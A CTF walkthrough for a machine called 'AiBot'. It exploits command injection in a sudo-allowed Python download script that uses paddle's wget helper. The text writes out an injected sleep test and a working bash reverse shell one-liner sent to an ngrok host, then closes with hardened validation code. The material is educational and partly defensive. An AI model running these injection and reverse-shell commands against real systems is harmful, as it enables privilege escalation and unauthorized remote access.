AiBot
Challenge Difficulty: Medium
Category: Machines
WALKTHROUGH
This challenge is from the Cybertalant 2025 Ramadan Nights CTF.
The first thing we get is a terminal as a user called ttyduser. To list this user's sudo permissions, run:
sudo -l

ttyduser can run /usr/bin/python3 /opt/aiwget.py with sudo. The script looks like this:
import argparse
import re
from paddle import utils

def is_valid_url(url):
    # Only the scheme prefix is checked; anything after "://" is accepted
    regex = re.compile(
        r'^(?:http|ftp|https)s?://',
        re.IGNORECASE,
    )
    return re.match(regex, url) is not None

def is_valid_path(path):
    return path.startswith("/tmp")

def main():
    parser = argparse.ArgumentParser(description='Download AI Model.')
    parser.add_argument('url', type=str, help='URL to download from')
    parser.add_argument('path', type=str, help='Path to save the file, must start with /tmp')
    args = parser.parse_args()
    if not is_valid_url(args.url):
        raise ValueError("The URL is not valid.")
    if not is_valid_path(args.path):
        raise ValueError("The path must start with /tmp.")
    # Both user-controlled values go straight to paddle's downloader
    utils.download._wget_download(args.url, args.path)

if __name__ == '__main__':
    main()
This script requires two arguments:
- url: the link to the AI model to download
- path: the path to save the model to, which must start with /tmp
It takes both arguments directly from the user and passes them to the _wget_download function.
We found a CVE for the utils.download._wget_download function: the URL ends up inside a shell command, so a ';' in it lets us run our own commands.

So we tried it, injecting a sleep to confirm the command runs:
sudo /usr/bin/python3 /opt/aiwget.py "https://; sleep 10" /tmp/model

It works (the command hangs for 10 seconds), so let's get a reverse shell, using ngrok to expose a TCP listener:
ngrok tcp 4444

sudo /usr/bin/python3 /opt/aiwget.py "https://; bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/14455 0>&1'" /tmp/model
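As an added example, not part of the original walkthrough or the challenge's script, the following Python contrasts the two checks from /opt/aiwget.py with stricter versions that would have blocked this injection: `strict_is_valid_url` parses the URL and allows only a plain hostname and a metacharacter-free path, `strict_is_valid_path` resolves the target before comparing it with /tmp, and `build_download_argv` shows the argv form in which a ';' is plain data. The `strict_*` and `build_download_argv` names are this example's own assumptions.

```python
import os
import re
from urllib.parse import urlparse

# The two checks exactly as /opt/aiwget.py defines them.
def weak_is_valid_url(url):
    return re.match(r'^(?:http|ftp|https)s?://', url, re.IGNORECASE) is not None

def weak_is_valid_path(path):
    return path.startswith("/tmp")

# Hardened replacements (assumed for this example, not the script's own code).
_HOST_RE = re.compile(r'^[a-z0-9](?:[a-z0-9.-]*[a-z0-9])?$', re.IGNORECASE)
_PATH_RE = re.compile(r'^[A-Za-z0-9._~/-]*$')  # no spaces, ';', '|', quotes, ...

def strict_is_valid_url(url):
    """Accept only http(s)/ftp URLs with a plain hostname and a benign path."""
    p = urlparse(url)
    if p.scheme.lower() not in ("http", "https", "ftp"):
        return False
    # The weak regex only looks at the prefix, so "https://; sleep 10" passes it;
    # here the garbage lands in the hostname and fails the character whitelist.
    if p.hostname is None or not _HOST_RE.match(p.hostname):
        return False
    return bool(_PATH_RE.match(p.path)) and not (p.params or p.query or p.fragment)

def strict_is_valid_path(path):
    """Resolve '..' and symlinks, then require the result to live under /tmp itself."""
    root = os.path.realpath("/tmp")
    real = os.path.realpath(path)
    # startswith("/tmp") also accepts /tmpfoo and /tmp/../etc/passwd; commonpath does not.
    return os.path.commonpath([root, real]) == root

def build_download_argv(url, path):
    """Argument vector for a downloader: no shell involved, so ';' in url is just data."""
    return ["wget", "--quiet", "-O", path, url]
```

Passing `build_download_argv(...)` to `subprocess.run` without `shell=True` keeps the URL a single argument, which is the property the vulnerable downloader lacks.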
